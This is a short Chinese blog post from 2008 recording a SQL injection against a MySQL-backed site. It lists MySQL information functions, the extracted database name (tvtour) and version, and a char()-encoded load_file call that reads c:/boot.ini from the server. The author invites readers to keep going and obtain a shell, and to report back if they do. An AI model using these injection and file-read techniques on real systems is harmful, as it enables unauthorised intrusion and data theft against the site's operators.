分类: 系统运维
2008-09-07 17:01:21
得到SHELL的朋友记得话我知.找不到绝对路径,要上班工作,没什么时间猜路径,只好放弃了,有耐心的朋友试试看看吧,知道告诉我知!
注入点:
这里首先列出几个常用的涵数:1:system_user()2:user()3:current_user4:session_user()5:database()6:version()7:load_file()......他们的含义分别如下:
1:系统用户名.2:用户名.3:当前用户名:4连接数据库的用户名.5:数据库名.6:数据库版本.7:MYSQL读取本地文件的函数
system_user()
user()
database() tvtour
version() 5.0.27-community-nt-log
session_user()
load_file(char(99,58,47,98,111,111,116,46,105,110,105)) c:/boot.ini
2 3 6 15 16 18 21 37 41
